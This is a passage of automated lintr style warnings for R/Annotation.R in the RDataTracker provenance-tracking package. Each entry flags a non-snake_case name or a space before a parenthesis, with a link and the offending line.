.ddg.wrap.last.line(func.definition, function.decl@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:658:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L658) *style:* **Variable or function name should be snake_case.**\n```r\n​    func.definition <- .ddg.wrap.with.ddg.eval(func.definition, function.decl@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:663:10:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n         ^\n```\n[R/Annotation.R:663:25:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n                        ^\n```\n[R/Annotation.R:663:31:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L663) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​  return (as.expression (call (\"<-\", as.name(func.name), func.definition)))\n                              ^\n```\n[R/Annotation.R:672:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L672) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.function.block <- function(func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:672:40:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L672) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.function.block <- function(func.definition) {\n                                       ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:674:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L674) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:677:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L677) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:680:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L680) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body <- call(\"{\", func.body)\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:689:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:689:44:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n                                           ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:689:61:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L689) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.add.conditional.statement <- function(func.definition, func.name) {\n                                                            ^~~~~~~~~\n```\n[R/Annotation.R:691:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L691) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:694:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L694) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:702:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L702) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body.txt <-\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:709:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L709) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.expr <- parse(text=new.func.body.txt)\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:710:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L710) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.func.body <- new.func.expr[[1]]\n  ^~~~~~~~~~~~~\n```\n[R/Annotation.R:722:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L722) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.insert.ddg.function <- function(func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:722:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L722) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.insert.ddg.function <- function(func.definition) {\n                                     ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:724:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L724) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:727:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L727) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:734:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L734) *style:* **Variable or function name should be snake_case.**\n```r\n​  inserted.statement <- call(\"ddg.function\")\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:735:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L735) *style:* **Variable or function name should be snake_case.**\n```r\n​  new.statements.txt <- c(as.list(\"{\"), inserted.statement, \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:755:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L755) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.return.parameters <- function(block, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:755:48:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L755) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.return.parameters <- function(block, parsed.stmts) {\n                                               ^~~~~~~~~~~~\n```\n[R/Annotation.R:774:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L774) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- \"\"\n          ^~~~~~~~~~\n```\n[R/Annotation.R:776:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L776) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- statement[[2]]\n          ^~~~~~~~~~\n```\n[R/Annotation.R:788:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L788) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts[[i-2]]\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:793:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L793) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:800:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L800) *style:* **Variable or function name should be snake_case.**\n```r\n​          ret.params <- .ddg.wrap.return.parameters(ret.params, parsed.stmt)\n          ^~~~~~~~~~\n```\n[R/Annotation.R:803:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L803) *style:* **Variable or function name should be snake_case.**\n```r\n​        new.ret.params <- .ddg.create.ddg.return.call(ret.params, parsed.stmt)\n        ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:804:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L804) *style:* **Variable or function name should be snake_case.**\n```r\n​        new.statement <- call(\"return\", new.ret.params)\n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:814:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L814) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts[[i-2]]\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:819:11:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L819) *style:* **Variable or function name should be snake_case.**\n```r\n​          parsed.stmt <- parsed.stmts\n          ^~~~~~~~~~~\n```\n[R/Annotation.R:846:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:846:45:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n                                            ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:846:62:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L846) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.all.return.parameters <- function(func.definition, parsed.stmts) {\n                                                             ^~~~~~~~~~~~\n```\n[R/Annotation.R:848:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L848) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:851:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L851) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:873:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L873) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:873:38:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L873) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n                                     ^\n```\n[R/Annotation.R:873:39:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L873) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.find.last.statement <- function (func.definition) {\n                                      ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:875:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L875) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:894:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:894:33:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n                                ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:894:50:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L894) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.last.line <- function(func.definition, parsed.stmts) {\n                                                 ^~~~~~~~~~~~\n```\n[R/Annotation.R:896:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L896) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:899:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L899) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:905:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L905) *style:* **Variable or function name should be snake_case.**\n```r\n​  last.statement <- block[[pos]]\n  ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:906:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L906) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.stmt <- parsed.stmts[[length(parsed.stmts)]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:908:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L908) *style:* **Variable or function name should be snake_case.**\n```r\n​  wrapped.statement <- .ddg.create.ddg.return.call(last.statement, parsed.stmt)\n  ^~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:41:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                        ^\n```\n[R/Annotation.R:922:42:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                         ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:922:58:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L922) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.create.ddg.return.call <- function (last.statement, parsed.stmt) {\n                                                         ^~~~~~~~~~~\n```\n[R/Annotation.R:931:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L931) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", last.statement, function() parsed.stmt))\n           ^\n```\n[R/Annotation.R:931:18:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L931) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", last.statement, function() parsed.stmt))\n                 ^\n```\n[R/Annotation.R:941:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L941) *style:* **Variable or function name should be snake_case.**\n```r\n​    new.statement <- .ddg.create.ddg.eval.call(last.statement, parsed.stmt)\n    ^~~~~~~~~~~~~\n```\n[R/Annotation.R:942:12:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L942) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", new.statement, function() parsed.stmt))\n           ^\n```\n[R/Annotation.R:942:18:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L942) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    return (call (\"ddg.return.value\", new.statement, function() parsed.stmt))\n                 ^\n```\n[R/Annotation.R:957:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:957:37:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n                                    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:957:54:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L957) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.wrap.with.ddg.eval <- function(func.definition, parsed.stmts) {\n                                                     ^~~~~~~~~~~~\n```\n[R/Annotation.R:959:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L959) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.params <- func.definition[[2]]\n  ^~~~~~~~~~~\n```\n[R/Annotation.R:962:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L962) *style:* **Variable or function name should be snake_case.**\n```r\n​  func.body <- func.definition[[3]]\n  ^~~~~~~~~\n```\n[R/Annotation.R:976:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L976) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.stmt <- parsed.stmts[[i-2]]\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:977:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L977) *style:* **Variable or function name should be snake_case.**\n```r\n​      new.statement <- .ddg.create.ddg.eval.call(statement, parsed.stmt)\n      ^~~~~~~~~~~~~\n```\n[R/Annotation.R:989:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L989) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.if.statement <- function(command) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:992:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L992) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- deparse(command@parsed[[1]])\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:997:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L997) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command <- command@parsed[[1]]\n    ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:998:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L998) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.stmts <- command@contained\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:1004:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1004) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- vector()\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1013:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1013) *style:* **Variable or function name should be snake_case.**\n```r\n​      block.stmts<- list ()\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:1013:26:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1013) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​      block.stmts<- list ()\n                         ^\n```\n[R/Annotation.R:1015:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1015) *style:* **Variable or function name should be snake_case.**\n```r\n​        block.stmts <- c(block.stmts, parsed.stmts[[i+ptr]])\n        ^~~~~~~~~~~\n```\n[R/Annotation.R:1030:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1030) *style:* **Variable or function name should be snake_case.**\n```r\n​        statement.txt <- paste(c(paste(\"if (\", cond, \")\", sep=\"\"), \n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1033:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1033) *style:* **Variable or function name should be snake_case.**\n```r\n​        statement.txt <- paste(c(paste(\"} else if (\", cond, \")\", sep=\"\"), \n        ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1040:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1040) *style:* **Variable or function name should be snake_case.**\n```r\n​        parsed.command.txt <- parsed.command.txt[c(1:last)]\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1042:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1042) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- append(parsed.command.txt, statement.txt)\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1046:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1046) *style:* **Variable or function name should be snake_case.**\n```r\n​        final.else <- TRUE\n        ^~~~~~~~~~\n```\n[R/Annotation.R:1048:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1048) *style:* **Variable or function name should be snake_case.**\n```r\n​        final.else <- FALSE\n        ^~~~~~~~~~\n```\n[R/Annotation.R:1063:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1063) *style:* **Variable or function name should be snake_case.**\n```r\n​      block.stmts <- list()\n      ^~~~~~~~~~~\n```\n[R/Annotation.R:1065:9:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1065) *style:* **Variable or function name should be snake_case.**\n```r\n​        block.stmts <- c(block.stmts, parsed.stmts[[i+ptr]])\n        ^~~~~~~~~~~\n```\n[R/Annotation.R:1075:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1075) *style:* **Variable or function name should be snake_case.**\n```r\n​      statement.txt <- paste(c(paste(\"} else\", sep=\"\"), deparse(block), collapse=\"\"))\n      ^~~~~~~~~~~~~\n```\n[R/Annotation.R:1079:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1079) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- parsed.command.txt[c(1:last)]\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1080:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1080) *style:* **Variable or function name should be snake_case.**\n```r\n​      parsed.command.txt <- append(parsed.command.txt, statement.txt)\n      ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1084:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1084) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <- \n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1086:3:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1086) *style:* **Variable or function name should be snake_case.**\n```r\n​  parsed.command.txt <-\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1102:1:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1102) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.loop.statement <- function(command, loop.type) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1102:51:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1102) *style:* **Variable or function name should be snake_case.**\n```r\n​.ddg.annotate.loop.statement <- function(command, loop.type) {\n                                                  ^~~~~~~~~\n```\n[R/Annotation.R:1106:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1106) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command.txt <- deparse(command@parsed[[1]])\n    ^~~~~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1112:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1112) *style:* **Variable or function name should be snake_case.**\n```r\n​    parsed.command <- command@parsed[[1]]\n    ^~~~~~~~~~~~~~\n```\n[R/Annotation.R:1115:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1115) *style:* **Variable or function name should be snake_case.**\n```r\n​    ddg.loop.num <- .ddg.add.loop()\n    ^~~~~~~~~~~~\n```\n[R/Annotation.R:1133:5:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1133) *style:* **Variable or function name should be snake_case.**\n```r\n​    annotated.block <- .ddg.wrap.block.with.ddg.eval(block, command@contained)\n    ^~~~~~~~~~~~~~~\n```\n[R/Annotation.R:1137:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1137) *style:* **Variable or function name should be snake_case.**\n```r\n​      index.var <- parsed.command[[2]]\n      ^~~~~~~~~\n```\n[R/Annotation.R:1138:7:](https://github.com/End-to-end-provenance/RDataTracker/blob/eeaa5efdb1b350be2fc7108012b6a5303d7574fc/R/Annotation.R#L1138) *style:* **Variable or function name should be snake_case.**\n```r\n​      annotated.block <- .ddg.insert.ddg.forloop(annotated.block, index.var)\n      